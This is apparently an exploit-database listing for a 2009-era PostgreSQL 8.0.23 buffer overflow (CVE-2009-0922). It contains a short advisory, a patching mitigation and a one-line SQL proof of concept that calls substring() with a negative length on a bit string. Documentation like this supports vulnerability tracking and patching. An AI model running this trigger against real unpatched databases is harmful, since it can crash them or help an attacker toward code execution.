header-logo
Suggest Exploit
vendor:
PostgreSQL
by:
Unknown
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: PostgreSQL
Affected Version From: 8.0.23
Affected Version To: Unknown
Patch Exists: YES
Related CWE: CVE-2009-0922
CPE: a:postgresql:postgresql:8.0.23
Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2009-1484/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2009-1067/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2009-0922/https://www.rapid7.com/db/vulnerabilities/postgres-cve-2009-0922/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2009-0922/https://www.rapid7.com/db/vulnerabilities/suse-cve-2009-0922/
Other Scripts:
Platforms Tested:
Unknown

PostgreSQL Buffer Overflow Vulnerability

PostgreSQL is prone to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. Attackers can exploit this issue to execute arbitrary code with elevated privileges or crash the affected application.

Mitigation:

Apply the latest security patches provided by the vendor.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/37973/info

PostgreSQL is prone to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.

Attackers can exploit this issue to execute arbitrary code with elevated privileges or crash the affected application.

PostgreSQL 8.0.23 is vulnerable; other versions may also be affected.


testdb=# select substring(B'101010101010101010101010101010101010
10101010101',33,-15);

Navigation

Suggest Exploit

Services By CQR